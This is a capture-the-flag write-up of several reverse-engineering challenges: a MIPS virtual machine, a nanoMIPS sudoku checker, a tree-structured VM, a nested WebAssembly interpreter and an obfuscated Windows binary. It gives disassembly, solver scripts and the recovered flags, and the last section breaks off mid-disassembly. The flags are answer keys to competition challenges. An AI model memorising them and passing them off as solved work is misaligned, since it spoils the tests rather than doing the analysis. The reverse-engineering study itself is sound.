This was a great CTF and we hacked some stuff. Here’s how.
For this task we were given a small MIPS flash image that was to be run inside QEMU. While I set up tooling (retdec), kirschju went ahead and took a look into the image itself. He found some timer-based obfuscation techniques and a couple of strings used by the challenge. More interesting was what I found directly before the strings, namely a pointer table.
ROM:80002690 opc_table: .word op00 # 0
ROM:80002690 # DATA XREF: sub_80000698+1EC↑o
ROM:80002690 .word op01 # 1
ROM:80002690 .word op02 # 2
ROM:80002690 .word op03 # 3
ROM:80002690 .word op04 # 4
ROM:80002690 .word op05 # 5
ROM:80002690 .word op06 # 6
ROM:80002690 .word op07 # 7
ROM:80002690 .word op08 # 8
ROM:80002690 .word op09_load_imm # 9
ROM:80002690 .word op0a # 10
ROM:80002690 .word op0b # 11
ROM:80002690 .word op0c # 12
ROM:80002690 .word op0d # 13
ROM:800026C8 aWelcomeToFlagM:.ascii "Welcome to Flag Machine"<0>
ROM:800026C8 # DATA XREF: sub_80000698+6B0↑o
To better analyse these functions he used a small script to remove all the timer stuff which stripped branches from the functions.
#!/usr/bin/env python3
dat = bytearray(open("dump", "rb").read())
pat = b"\x10\x00\xFF\xFF\x00\x00\x00\x00"
dat = dat.replace(pat, bytes([0 for _ in range(len(pat)) ]))
open("dump_clean", "wb").write(dat)
He also found a suspicous region in memory:
ROM:80003D40 word_80003d40: .half 9
ROM:80003D42 .half 0x91D
ROM:80003D44 .half 9
ROM:80003D46 .half 0
ROM:80003D48 .half 0xA
ROM:80003D4a .half 5
ROM:80003D4c .half 6
ROM:80003D4e .half 0x14
ROM:80003D50 .half 9
ROM:80003D42 .half 1
ROM:80003D40 .half 0xA
ROM:80003D40 .half 1
ROM:80003D40 .half 0xB
ROM:80003D40 .half 8
ROM:80003D40 .half 9
Together with the pointer table we suspected it to be a virtual machine implementation. I fired up the virtual machine and attached using gdb-multiarch
. Don’t forget to set the architecture to mips
and endianes to big
and put a breakpoint on all these functions. The I entered some bogus flag flag{asdhfaiusdhfuiasf}
and waited for the breakpoint to trigger. The register values were not immediately helpful. Searching the around the VM code quickly revealed the internal state of the machine.
(gdb) x/20xw 0x80003d00
0x80003d00: 0x1000fa38 0x00000000 0x00000000 0x03e00008
0x80003d10: 0x00000000 0x1000fa3b 0x00000000 0x00000000
0x80003d20: 0x80002610 0x000b0000 0x00000000 0x80003d42
0x80003d30: 0x80018000 0x80020000 0x80018000 0x80008004
0x80003d40: 0x0009091d 0x00090000 0x000a0005 0x00060014
Continuing for one machine instruction reveals an updated state
(gdb) x/20xw 0x80003d00
0x80003d00: 0x1000fa38 0x00000000 0x00000000 0x03e00008
0x80003d10: 0x00000000 0x1000fa3b 0x00000000 0x00000000
0x80003d20: 0x80002610 0x000b0000 0x00000000 0x80003d46
0x80003d30: 0x80018000 0x80020000 0x80018002 0x80008004
0x80003d40: 0x0009091d 0x00090000 0x000a0005 0x00060014
(gdb) x/1xh 0x80018000
0x80018000: 0x091d
Taking a close look one can see a couple of important variables already. Single stepping the virtual machine and comparing the VM states I recovered all VM instructions.
Address | Description |
---|---|
0x80003d24 |
loop variable |
0x80003d28 |
mul / mod register |
0x80003d2c |
instruction pointer |
0x80003d30 |
stack base |
0x80003d38 |
stack top |
I wrote a quick disassembler for the VM and continued the analysis of the VM.
with open("vmcode", "rb") as f:
data1 = f.read(0x185)
data2 = f.read()
ins = [*map(lambda x: int.from_bytes(bytearray(x), "big"), chunk(data1, 2))]
instrs = [ ('0',1)
, ('sub_inv', 1)
, ('mul', 1)
, ('mod', 1)
, ('4', 1)
, ('eq', 1)
, ('jc', 2)
, ('jnc', 2)
, ('loadflag', 1)
, ('imm', 2)
, ('loadacc', 1)
, ('storacc', 1)
, ('c', 1)
, ('d', 1)]
i = 0
disass = []
while i < len(ins):
opc = ins[i]
name, l = instrs[opc]
if l == 1:
print(f"{i:2x}: {name}")
disass.append([i, f"{name}", opc])
else:
arg = ins[i + 1]
print(f"{i:2x}: {name} {arg:#x}")
disass.append([i, f"{name} {arg:#x}", opc, arg])
i += 1
i += 1
The machine started by writing the first 28 bytes of the flag to the stack and then continued with a reccuring pattern:
12: imm 0x11
14: mul
15: imm 0xb248
17: mod
18: imm 0x72a9
1a: eq
1b: jnc 0x144 # fail
This is the same as
\[
(\mathtt{11}_{16} \times\mathrm{pop\_stack})\bmod \mathtt{B248}_{16} = \mathtt{72A9}_{16}
\]
It essentially checks for equality in the integer mod ring $\mathtt{B248}_{16}$. As $\mathtt{11}_{16}$ is prime there exists an unique multiplicative inverse. We can calculate the value pop_stack
in order for the equality to hold by $(\mathtt{4969}_{16} \times \mathtt{72A9}_{16})\bmod \mathtt{B248}_{16}$. We similarly proceed for all other such blocks of VM code and are able to recover the flag. Since this is a stack machine one has to reverse the order of the individual results.
start = 0x19
snd = 0x24
tars = [ins[i] for i in range(0x19, len(ins), 0xb)][:-1]
flag = b"".join([((0x4969 * i) % 0xb248).to_bytes(2, 'big') for i in tars][::-1])
print(f"flag{{{flag.decode()}}}")
This task taught us yet another architecture we never heared of before called nanoMIPS. The challenge consists of a small Linux ELF file and our job (judging from the output of almighty strings
) is to find out how to make the program print Right
. So far so easy, right?
Luckily, one of us noticed that there exists a vendor-supplied readily available build of the binutils toolchain for the nanoMIPS architecture. From this, we obtained a linear sweep disassembly using nanomips-linux-musl-objdump -d babymips
. As the full disassembly listing was only ~400 lines we deemed manual reversing feasible and stopped any early-phase development of supportive tooling to better deal with the architecture.
A quick walkthrough of our approach:
nanomips-linux-musl-readelf -a babymips
tells us that the entry point of the binary is 0x4003f6
The code at 0x4003f6
transfers control to 0x400410
, which just calls __libc_start_main
(the external function can be resolved by knowing that (nano)MIPS usually likes to address external functions via a fixed relative offset to the beginning of the got
section by means of the $gp
register, for which readelf
nicely resolves a mapping of offsets to external function names:
> nanomips-linux-musl-readelf -a babymips | grep gp
004200ac 0(gp) 00000000 Lazy stub resolver
004200b0 4(gp) 80000000 Module pointer
004200b4 8(gp) 00400790
004200b8 12(gp) 004003c8
004200bc 16(gp) 00000000 Global _ITM_deregisterTMCloneTable
004200c0 20(gp) 00000000 Global _ITM_registerTMCloneTable
004200c4 24(gp) 00000000 Global __deregister_frame_info
004200c8 28(gp) 00000000 Global __register_frame_info
004200cc 32(gp) 00000000 Global _Jv_RegisterClasses
004200d0 36(gp) 004003d0 Lazy-stub read
004200d4 40(gp) 004003d6 Lazy-stub strncmp
004200d8 44(gp) 004003dc Lazy-stub puts
004200dc 48(gp) 004003e2 Lazy-stub memset
004200e0 52(gp) 004003e8 Lazy-stub __libc_start_main
Since __libc_start_main
takes a pointer to the main
function as its first argument we knew that main
was located at 0x4006e4
.
From there, combining our external function resolver with basic knowledge about how compilers set up stack frames, we annotated the main
function’s disassembly to recover the approximate source code:
4006e4: save 128,fp,ra,gp // <main>
4006e8: addiu fp,sp,-3968
4006ec: lapc gp,4200ac <_fini+0x1f91c>
4006f0: addiu a3,sp,12
4006f2: li a2,90
4006f4: movep a0,a1,a3,zero
4006f6: lw a3,48(gp)
4006fa: jalrc a3 memset(sp + 12, 0x00, 90);
4006fc: addiu a3,sp,12
4006fe: li a2,62
400700: movep a0,a1,zero,a3
400702: lw a3,36(gp)
400706: jalrc a3 read(0, sp + 12, 62);
400708: lbu a3,73(sp)
40070c: bneic a3,125,40077c <_init+0x3b4>
400710: addiu a3,sp,12
400712: li a2,5
400714: lapc a1,400800 <_fini+0x70>
400718: move a0,a3
40071a: lw a3,40(gp)
40071e: jalrc a3 strncmp(sp + 12, "flag{", 5);
400720: move a3,a0
400722: bnezc a3,40077c <_init+0x3b4>
400724: sw zero,108(sp) *(int *)(sp + 108) = 0;
400726: li a3,5
400728: sw a3,104(sp) *(int *)(sp + 104) = 5;
40072a: bc 400758 <_init+0x390>
40072c: lw a3,108(sp)
40072e: addiu a3,a3,1
400730: sw a3,108(sp) *(int *)(sp + 108)++;
400732: lapc a2,420000 <_fini+0x1f870>
400736: lw a3,108(sp)
400738: addu a3,a2,a3
40073a: lbu a3,0(a3)
40073c: bnezc a3,40072c <_init+0x364> if (arr_0x420000[*(int *)(sp + 108)] != 0) goto 40072c
40073e: lw a3,104(sp)
400740: addiu a2,sp,112
400742: addu a3,a2,a3
400744: lbu a2,-100(a3) a2 = *(char *)(sp + 12 + *(int *)(sp + 104));
400748: lapc a1,420000 <_fini+0x1f870>
40074c: lw a3,108(sp)
40074e: addu a3,a1,a3
400750: sb a2,0(a3) arr_0x420000[*(int *)(sp + 108)] = flag[*(int *)(sp + 104)];
400752: lw a3,104(sp)
400754: addiu a3,a3,1
400756: sw a3,104(sp) *(int *)(sp + 104)++;
400758: lw a3,104(sp)
40075a: bltic a3,61,400732 <_init+0x36a> if (*(int *)(sp + 104*) < 61) goto 400732
40075e: balc 4006b6 <check_all>
400760: move a3,a0
400762: beqzc a3,400770 <_init+0x3a8>
400764: lapc a0,400808 <_fini+0x78>
400768: lw a3,44(gp)
40076c: jalrc a3 puts("Right");
40076e: bc 400786 <_init+0x3be>
400770: lapc a0,400810 <_fini+0x80>
400774: lw a3,44(gp)
400778: jalrc a3 puts("Wrong");
40077a: bc 400786 <_init+0x3be>
40077c: lapc a0,400810 <_fini+0x80>
400780: lw a3,44(gp)
400784: jalrc a3 puts("Wrong");
400786: move a3,zero
400788: move a0,a3
40078a: restore.jrc 128,fp,ra,gp
The basic functionality of main
can be summarized as follows: Read in 62 characters from stdin
and check whether they are prefixed by flag{
. Then, for every character behind flag{
, insert it into the free (== zero) entries of an array stored at virtual address 0x420000
we refer to as blk
. If not all of the 62 characters are processed, print Wrong
and exit. Otherwise, call a function we refer to as check_all
at 0x4006b6
. If this function returns 0 print Wrong
and exit. Print Right
otherwise.
A nifty trick we used to resolve the address of the array at 0x420000
was to patch the ELF such that it would indicate a standard MIPS machine type (EM_MIPS
, 0x08
) and load it into IDA Pro. Even if IDA cannot make sense of the disassembly, it still loads the ELF segments and handles sections correctly thus allowing us to easily look up data at virtual addresses.
So, clearly, our job is to satisfy the checks contained in function 4006b6
. After inspecting the code at this location we just found it to call three more subfunctions at locations 0x400580
(check1
), 0x4005ee
(check2
), and 0x400652
(check3
). Only if all three functions return non-zero, check_all
would return 1
(i.e. success).
Using our annotation strategy we derived the following for check1
:
<check1>:
400580: save 48,fp,ra
400584: addiu fp,sp,-4048
400588: sw zero,12(sp) unsigned char tmp[9] = { 0 };
40058a: sw zero,16(sp)
40058c: sb zero,20(sp)
400590: sw zero,28(sp) unsigned int j = 0; // *(int *)(sp + 28)
400592: bc 4005e0 <_init+0x218>
400594: sw zero,24(sp) unsigned int i = 0; // *(int *)(sp + 24)
400596: bc 4005c6 <_init+0x1fe>
400598: lw a2,28(sp)
40059a: move a3,a2
40059c: sll a3,a3,3
40059e: addu a3,a3,a2
4005a0: lapc a2,420054
4005a4: addu a2,a3,a2 // a2 = (arr_420054[9 * j]);
4005a6: lw a3,24(sp)
4005a8: addu a3,a2,a3
4005aa: lbu a3,0(a3) // a3 = arr_420054[9 * j + i];
4005ac: move a2,a3
4005ae: lapc a3,420000
4005b2: addu a3,a2,a3
4005b4: lbu a2,0(a3) a2 = arr_420000[arr_420054[9 * j + i]];
4005b6: lw a3,24(sp)
4005b8: addiu a1,sp,32
4005ba: addu a3,a1,a3
4005bc: sb a2,-20(a3) tmp[i] = a2;
4005c0: lw a3,24(sp)
4005c2: addiu a3,a3,1
4005c4: sw a3,24(sp) i++;
4005c6: lw a3,24(sp)
4005c8: bltic a3,9,400598 if (i < 9) goto 400598;
4005cc: addiu a3,sp,12
4005ce: move a0,a3
4005d0: balc 4004c6 <check0_chk_perm>
4005d2: move a3,a0
4005d4: bnezc a3,4005da if (!check0_chk_perm(tmp)) return 0;
4005d6: move a3,zero
4005d8: bc 4005e8
4005da: lw a3,28(sp)
4005dc: addiu a3,a3,1
4005de: sw a3,28(sp) j++;
4005e0: lw a3,28(sp)
4005e2: bltic a3,9,400594 if (j < 9) goto 400594;
4005e6: li a3,1 return 1;
4005e8: move a0,a3
4005ea: restore.jrc 48,fp,ra
This function interprets the constants of array arr_420054
as a 9x9 matrix and uses its entries as indices into our (expanded) blk
(address 0x420000
) containing the flag+constants mix. Then, for every group of 9 characters extracted from our blk
like this, call another function check0_chk_perm
. So let’s annotate this one too:
<check0_chk_perm>:
4004c6: save 80,fp,ra
4004c8: addiu fp,sp,-4016
4004cc: sw a0,12(sp)
4004ce: sw zero,20(sp) int c[9] = { 0 };
4004d0: sw zero,24(sp)
4004d2: sw zero,28(sp)
4004d4: sw zero,32(sp)
4004d6: sw zero,36(sp)
4004d8: sw zero,40(sp)
4004da: sw zero,44(sp)
4004dc: sw zero,48(sp)
4004de: sw zero,52(sp)
4004e0: sw zero,60(sp) int i = 0; // *(int *)(sp + 60)
4004e2: bc 400550 <_init+0x188>
4004e4: lw a3,60(sp)
4004e6: lw a2,12(sp)
4004e8: addu a3,a2,a3
4004ea: lbu a3,0(a3) a3 = perm[i]
4004ec: addiu a3,a3,-97
4004f0: bgeiuc a3,26,400546 if (perm[i] - 0x61 >= 26) return 0;
4004f4: lapc a2,400798
4004f8: lwxs a2,a3(a2) a2 = arr_400798[perm[i] - 0x61];
4004fa: brsc a2 switch (perm[i]) {
4004fe: lw a3,20(sp) /* 0x00 */ case 'z':
400500: addiu a3,a3,1 /* 0x02 */ c[0]++;
400502: sw a3,20(sp) /* 0x04 */ break;
400504: bc 40054a <_init+0x182> /* 0x06 */
400506: lw a3,24(sp) /* 0x08 */ case 'x':
400508: addiu a3,a3,1 /* 0x0a */ c[1]++;
40050a: sw a3,24(sp) /* 0x0c */ break;
40050c: bc 40054a <_init+0x182> /* 0x0e */
40050e: lw a3,28(sp) /* 0x10 */ case 'c':
400510: addiu a3,a3,1 /* 0x12 */ c[2]++;
400512: sw a3,28(sp) /* 0x14 */ break;
400514: bc 40054a <_init+0x182> /* 0x16 */
400516: lw a3,32(sp)> /* 0x18 */ case 'a':
400518: addiu a3,a3,1> /* 0x1a */ c[3]++;
40051a: sw a3,32(sp)> /* 0x1c */ break;
40051c: bc 40054a <_init+0x182>> /* 0x1e */
40051e: lw a3,36(sp)> /* 0x20 */ case 's':
400520: addiu a3,a3,1> /* 0x22 */ c[4]++;
400522: sw a3,36(sp)> /* 0x24 */ break;
400524: bc 40054a <_init+0x182> /* 0x26 */
400526: lw a3,40(sp) /* 0x28 */ case 'd':
400528: addiu a3,a3,1 /* 0x2a */ c[5]++;
40052a: sw a3,40(sp) /* 0x2c */ break;
40052c: bc 40054a <_init+0x182> /* 0x2e */
40052e: lw a3,44(sp) /* 0x30 */ case 'q':
400530: addiu a3,a3,1 /* 0x32 */ c[6]++;
400532: sw a3,44(sp) /* 0x34 */ break;
400534: bc 40054a <_init+0x182> /* 0x36 */
400536: lw a3,48(sp) /* 0x38 */ case 'w':
400538: addiu a3,a3,1 /* 0x3a */ c[7]++;
40053a: sw a3,48(sp) /* 0x3c */ break;
40053c: bc 40054a <_init+0x182> /* 0x3e */
40053e: lw a3,52(sp) /* 0x40 */ case 'e':
400540: addiu a3,a3,1 /* 0x42 */ c[8]++;
400542: sw a3,52(sp) /* 0x44 */ break;
400544: bc 40054a <_init+0x182> /* 0x46 */
400546: move a3,zero default: return 0;
400548: bc 40057c <_init+0x1b4> }
40054a: lw a3,60(sp)
40054c: addiu a3,a3,1
40054e: sw a3,60(sp) i++;
400550: lw a3,60(sp)
400552: bltic a3,9,4004e4 if (i < 9) goto 4004e4;
400556: sw zero,56(sp) j = 0;
400558: bc 400574
40055a: lw a3,56(sp)
40055c: sll a3,a3,2
40055e: addiu a2,sp,64
400560: addu a3,a2,a3
400562: lw a3,-44(a3) a3 = c[j];
400566: beqic a3,1,40056e if (c[j] != 1)
40056a: move a3,zero return 0;
40056c: bc 40057c
40056e: lw a3,56(sp)
400570: addiu a3,a3,1
400572: sw a3,56(sp) j++;
400574: lw a3,56(sp)
400576: bltic a3,9,40055a if (j < 9) goto 40055a;
40057a: li a3,1
40057c: move a0,a3
40057e: restore.jrc 80,fp,ra
This function is a bit cumbersome to reverse, because it implements a large switch
statement via a lookup table containing relative indices. As the array is 0x61-based, we recovered a mapping between the matched letters and the executed code via the indices, which can be found in the annotation. Basically, the code just counts the occurrences of the letters zxcasdqwe
. The check that is performed is then whether all counters have the value 1
.
By now, we realized that this check has a striking similarity to the popular 数独 puzzles. Quickly glancing over check2
and check3
we realized that they implemented similar checks counting characters contained in arrays of size 9, once on a per-column and once on a per-row basis. This confirmed our initial feeling and we quickly hacked up the following Sudoku solver based on the z3 theorem prover, which swiftly found the flag.
#!/usr/bin/env python3
import z3
import math
blk = [
0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x64, 0x00, 0x00, 0x77, 0x00, 0x00, 0x64, 0x00,
0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x65, 0x00,
0x77, 0x00, 0x71, 0x00, 0x61, 0x00, 0x65, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x7A, 0x64,
0x00, 0x00, 0x73, 0x77, 0x71, 0x00, 0x00, 0x00, 0x00, 0x77,
0x00, 0x00, 0x73, 0x78, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00,
0x00, 0x7A, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64,
0x78,
]
perms = [
0x00, 0x01, 0x02, 0x03, 0x0A, 0x0C, 0x0D, 0x0E, 0x13,
0x04, 0x05, 0x06, 0x0F, 0x18, 0x19, 0x21, 0x2A, 0x33,
0x07, 0x08, 0x10, 0x11, 0x1A, 0x22, 0x23, 0x2B, 0x34,
0x09, 0x12, 0x1B, 0x24, 0x2D, 0x36, 0x37, 0x3F, 0x48,
0x0B, 0x14, 0x15, 0x1C, 0x1D, 0x1E, 0x25, 0x2E, 0x27,
0x16, 0x17, 0x1F, 0x20, 0x28, 0x31, 0x3A, 0x42, 0x43,
0x26, 0x2F, 0x30, 0x38, 0x39, 0x40, 0x41, 0x49, 0x4A,
0x29, 0x32, 0x3B, 0x3C, 0x3D, 0x44, 0x4B, 0x4C, 0x4D,
0x2C, 0x35, 0x3E, 0x45, 0x46, 0x47, 0x4E, 0x4F, 0x50,
]
s = z3.Solver()
fs = [ z3.BitVec("f{}".format(i), 9) for i in range(len(blk)) ]
for j in range(9):
for i in range(9):
if blk[j * 9 + i] == 0:
s.add(z3.Or(
fs[j * 9 + i] == (1 << 0),
fs[j * 9 + i] == (1 << 1),
fs[j * 9 + i] == (1 << 2),
fs[j * 9 + i] == (1 << 3),
fs[j * 9 + i] == (1 << 4),
fs[j * 9 + i] == (1 << 5),
fs[j * 9 + i] == (1 << 6),
fs[j * 9 + i] == (1 << 7),
fs[j * 9 + i] == (1 << 8),
))
else:
s.add(fs[j * 9 + i] == 1 << b"zxcasdqwe".index(blk[j * 9 + i]))
for j in range(9):
s.add(z3.Sum([fs[9 * j + i] for i in range(9)]) == 0x1ff)
s.add(z3.Sum([fs[9 * i + j] for i in range(9)]) == 0x1ff)
s.add(z3.Sum([fs[perms[9 * j + i]] for i in range(9)]) == 0x1ff)
print(s.check())
for j in range(9):
print(["zxcasdqwe"[int(math.log2(s.model()[fs[j * 9 + i]].as_long()))] for i in range(9) ])
flag = []
for j in range(9):
for i in range(9):
if blk[j * 9 + i] == 0x00:
flag.append("zxcasdqwe"[int(math.log2(s.model()[fs[j * 9 + i]].as_long()))])
print("flag{{{}}}".format("".join(flag)))
We’re given a 32-bit Linux executable which prompts us for the flag. Opening it up in IDA reveals only relatively few functions which mostly don’t seem complicated at all. The big exception to that observation is one of the functions in .init_array
which gets called during initialization. It consists of a huge basic block without any branches/loops. It malloc
s a bunch of small allocations and stores the returned addresses at fixed locations in static data. Then it fills the allocated chunks with references to static data and sets up a bunch of other stuff in .bss
. Looking at main()
we see that it just loads an address to static data and calls a function pointer there which basically confirms our suspicion: The real program logic is encoded in a tree which is setup up in the init function and the rest of the program just walks along the tree and executes code referenced in the tree. After reversing the rest of the functions we see that almost all just take a tree node as an argument and just do simple stuff like executing a function pointer contained in the node.
Our first approach was to reconstruct the state of the program after initialization and just rebuild the functions to get a better understanding of what actually happens. But then we noticed that actually all computation must happen in the one function which contains instructions to compute things. It has a switch to dynamically choose what to compute and takes two arguments from it’s child nodes. (this is similar to a virtual machine) With that in mind there’s a chance to take a big shortcut if we can just deduce the program logic by looking at what data flows in and out of that function. Luckily for us that did indeed work and we could just ignore the whole tree aspect of the challenge in the end.
After manually tracing that function with gdb we observe that:
u32
So we know (dynamically) what the transformed flag output must equal to and the function on the flag input is very simple. Fortunately everything is also processed in 4 byte chunks so it is actually very feasible to just brute force every individual flag chunk which is what we’ve done in the end:
use rayon::prelude::*;
fn main() {
let mut flag = Vec::new();
let targets = [
0xa25dc66a, 0xaa0036, 0xc64e001a, 0x369d0854, 0xf15bcf8f, 0x6bbe1965, 0x1966cd91,
0xd4c5fbfd, 0xb04a9b1b,
];
let mut xor = false;
for target in &targets {
flag.extend_from_slice(&brute_part(*target, xor).unwrap());
println!("{}", std::str::from_utf8(&flag).unwrap());
xor = !xor;
}
}
fn brute_part(target: u32, xor: bool) -> Option<[u8; 4]> {
let mut printable_chars = Vec::new();
for i in 0..=255u8 {
let c = i as char;
if c.is_ascii_graphic() {
if xor {
printable_chars.push(i ^ 0xaa);
} else {
printable_chars.push(i);
}
}
}
printable_chars
.par_iter()
.find_map_any(|b0| {
for b1 in &printable_chars {
for b2 in &printable_chars {
for b3 in &printable_chars {
let bytes = [*b0, *b1, *b2, *b3];
let mut a = u32::from_le_bytes(bytes);
let mut b = a;
for _ in 0..0x186a0 {
b <<= 0xd;
b ^= a;
b ^= b >> 0x11;
b ^= b << 5;
a = b;
}
if b == target {
return Some(bytes);
}
}
}
}
None
})
.map(|mut found| {
if xor {
for x in &mut found {
*x ^= 0xaa;
}
}
found
})
}
The program makes use of all threads and after roughly 2h we were greeted with the flag:
flag{HEY!Lumpy!!W@tcH_0ut_My_TrEe!!}
In this task, we deal with a fairly large webassembly binary, so I will only show the relevant parts of the decompilation.
Most of this was made a lot easier by decompiling the binaries with benediktwerner’s excellent rewasm
(featured, of course, in our very own xmas_future
challenge from last year), which unlike wasmdec
actually produced readable output!
Here is the main
function (function 13) of the ww
binary, cleaned up a little:
fn main(i32 argc, i32 argv) -> i32 {
/* ... */
puts(22037); // Secret:
var_17 = fgets(var_2 + 32, 64, load<i32>(23360) /* stdin */);
if var_17 != 0 & 1 {
input_len = strlen(var_2 + 32 /* input */);
buffer = calloc(0x5200 + 1, 1);
store<i32>(var_2 + 28 /* buffer */, buffer)
if buffer != 0 & 1 {
memcpy(buffer, 1024, 0x5200);
unpack(buffer, 0x5200, var_2 + 32 /* input */);
var_33 = memmem(buffer, 0x5200, 22080, strlen(22080));
if var_33 {
puts(22058); // Loading...
var_36 = load_wasm(buffer, 0x5200);
store<i32>(var_2 + 24, var_36)
var_37 = load<i32>(var_2 + 24);
var_38 = init_interpreter(var_37);
/* ... */
load_data_section(var_39);
load_globals(var_40);
puts(22069);
/* ... */
free_interpreter(var_43);
free_wasm_obj(var_44);
}
else {
puts(22050);
}
}
}
}
Of course, the function names give away half the game: we are dealing with a webassembly interpreter compiled to webassembly that loads an encrypted buffer. Clearly, we need to reverse the unpack
function and find a key that ensures that the string Welcome to 0CTF/TCTF 2020! Have a g00d time
(at address 22080) shows up in the decrypted buffer.
Analysis reveals that the buffer is unpacked in chunks of 512 bytes. Translated to Python, the unpacking routine looks like this:
def unpack_chunk(buf, start, key):
i = 255
for byte_in_chunk in range(512):
key_index = byte_in_chunk & 31;
key_byte = key[key_index]
source_byte = buf[start + byte_in_chunk]
diff = source_byte ^ i ^ key_byte
i = source_byte
buf[start + byte_in_chunk] = (diff - key_index) % 0x100
def unpack(buf, key):
for chunk in range(0, len(buf), 512):
unpack_chunk(buf, chunk, key)
Since we know the secret key is at most 32 bytes long (due to the & 31
in the unpacker), we can test for the target string at each location and verify that the rest shows up if we continue unpacking:
def i_at(position):
if position % 512 == 0:
return 255
return buf[position - 1]
with open('buffer', 'rb') as buff:
buf = buff.read()
assert len(buf) == 0x5200
target_message = b'Welcome to 0CTF/TCTF 2020! Have a g00d time'
def get_key(position):
key_bytes = bytearray(32)
for offset in range(len(target_message)):
shifted = position + offset
key_index = shifted & 31
key_byte = ((target_message[offset] + key_index) % 0x100) ^ buf[shifted] ^ i_at(shifted)
if offset < 32:
key_bytes[key_index] = key_byte
elif key_bytes[key_index] != key_byte:
return None
return bytes(key_bytes)
for candidate_start in range(len(buf) - len(target_message)):
key = get_key(candidate_start)
if key:
print(key)
copy = bytearray(buf)
unpack(copy, key)
with open(f'buffer.{key.decode()}', 'wb') as buff:
buff.write(copy)
This gives us exactly one candidate key: eNj0y_weba5SemB1Y.lstrip("web")!
Of course, we already know the decrypted buffer will be another webassembly binary — but initially, all tools fail to open it because of the large number of zero bytes at the end of the buffer. Once we strip those off, we can again decompile the binary, which turns out to contain quite a large mess of code.
When loaded with the correct secret, the program prints a banner with a number of possible operations (note that this binary is also used for a pwn challenge, so it is important not to get distracted here); the strings reveal a number of IO functions and show that the main function is function 22.
Secret: 🙄
Loading...
Go Go Go!!
aoshine~ What's up?
1. add pair
2. dump pair
3. check pair
4. exit
We also learn from the main function and the strings how the flag is constructed:
var_121 = func_3(var_118, var_120);
store<i32>(var_92 + 12, var_121)
var_122 = load<i32>(var_92 + 12);
if var_122 {
var_123 = load<i32>(var_92 + 12);
itoa(var_123, var_92 + 32); // stores itoa(var_123) in var_92 + 32
print(1212); // "flag is: flag{secret+"
print(var_92 + 32); // prints var_123
print(1234); // "}"
}
Clearly, we need to find what var_123
will be, i.e. what the result of func_3
is going to be.
At this point, there were about 25 minutes left in the CTF, so a bit of educated guessing was asked for. Since the code appears to deal with pairs of numbers (by the banner text), I simply assumed that var_118
and var_120
will be one such pair of numbers.
func_3
performs a number of operations on its two arguments, but we can discard most of the initial processing: There is only one code path that returns a non-zero value (which needs to happen so that we actually print the success message)! A cursory inspection of function 18 shows that it is just atoi
, and function 4 appears to check the numbers for validity of some kind (it just returns 0 or 1). At this point, I deferred reversing function 4 to the end, which ended up being the right choice (I actually never ended up having to reverse this function, and never managed to get the program to actually spit out the success message, but flag is flag).
func_3
continues on to check the two arguments against two linear equations:
var_16 = load<i32>(var_2 + 16); // atoi(arg_0)
var_17 = load<i32>(var_2 + 12); // atoi(arg_1)
var_18 = var_16 * 20 + var_17 * 87;
store<i32>(var_2 + 8, var_18) // atoi(arg_0) * 20 + atoi(arg_1) * 87
var_19 = load<i32>(var_2 + 16);
var_20 = load<i32>(var_2 + 12);
store<i32>(var_2 + 4, var_19 + var_20) // atoi(arg_0) + atoi(arg_1)
var_21 = load<i32>(var_2 + 8);
var_22 = (var_21 == 20200627 & 1) == 0; // 20x + 87y = 20200627
if !var_22 {
var_23 = load<i32>(var_2 + 4);
}
if var_22 || (var_23 == 249310 & 1) == 0 { // x + y = 249310
store<i32>(var_2 + 28, 0) // store 0
}
else {
var_24 = load<i32>(var_2 + 16);
var_25 = load<i32>(var_2 + 12);
var_26 = var_24 * 20 + var_25 * 20; // store 20x + 20y
store<i32>(var_2 + 28, var_26 + 628) // 20x + 20y + 628
}
This already reveals the result, and we don’t even need to understand what function 4 does!
Given $x + y = 249310$ and $20x + 87y = 20200627$, we can easily compute $x = 227081$ and $y = 22229$. Then, $20x + 20y + 628 = 4986828$ is the result of func_3
This gives us the flag:
flag{eNj0y_weba5SemB1Y.lstrip("web")!+4986828}
tl;dr: The challenge consists of a Windows executable for x86-64 that combines (slightly) customized crypto algorithms with obfuscation to delay analysis.
After opening the binary in IDA and studying the main
function a bit we found the high-level functionality of the program to be similar to this:
0x140001680
locating and hooking the (undocumented) KiUserExceptionDispatcher
subroutine.flag
of 32 bytes length.0x140007970
) executable via VirtualAlloc
, memcpy
and VirtualProtect
.0x1400080f0
consisting of 63 integers and create a C++ map out of it.TCTF_QUALS_2020_
, a pointer to a target buffer $T$ of size 208 bytes, and the constant 0x10
.0x140007060
) and list $l_1$ (0x140008000
).0x140007040
) into $4 \cdot 32$ bytes, and pass pointers to a chunk of the flag and $C$ to $f_1$ together with a pointer to the buffer $T$ filled earlier by $f_0$.Congrats, you got the flag.
.So far, so easy. If only $f_0$ and $f_1$ were straightforward to understand—as the KiUserExceptionDispatcher
hook suggests, both functions are protected by obfuscation involing debugging exceptions:
.data:0000000140007970 55 push rbp
.data:0000000140007971 41 57 push r15
.data:0000000140007973 41 56 push r14
.data:0000000140007975 41 55 push r13
.data:0000000140007977 41 54 push r12
.data:0000000140007979 53 push rbx
.data:000000014000797A 48 85 D2 test rdx, rdx
.data:000000014000797D 0F 94 44 24 DA setz byte ptr [rsp-26h]
.data:0000000140007982 48 85 C9 test rcx, rcx
.data:0000000140007985 0F 94 44 24 DB setz byte ptr [rsp-25h]
.data:000000014000798A 49 83 F8 10 cmp r8, 10h
.data:000000014000798E B8 19 2A F8 28 mov eax, 28F82A19h
.data:0000000140007993 41 B9 50 2E 43 ED mov r9d, 0ED432E50h
.data:0000000140007999 44 0F 45 C8 cmovnz r9d, eax
.data:000000014000799D 48 89 54 24 F8 mov [rsp-8], rdx
.data:00000001400079A2 48 8D 42 68 lea rax, [rdx+68h]
.data:00000001400079A6 48 89 44 24 F0 mov [rsp-10h], rax
.data:00000001400079AB B8 A4 91 06 BF mov eax, 0BF0691A4h
.data:00000001400079B0 CC int 3 ; Trap to Debugger
.data:00000001400079B1
.data:00000001400079B1 loc_1400079B1: ; CODE XREF: .data:00000001400079DD↓j
.data:00000001400079B1 db 26h
.data:00000001400079B1 26 B8 F2 4C 67 6E mov eax, 6E674CF2h
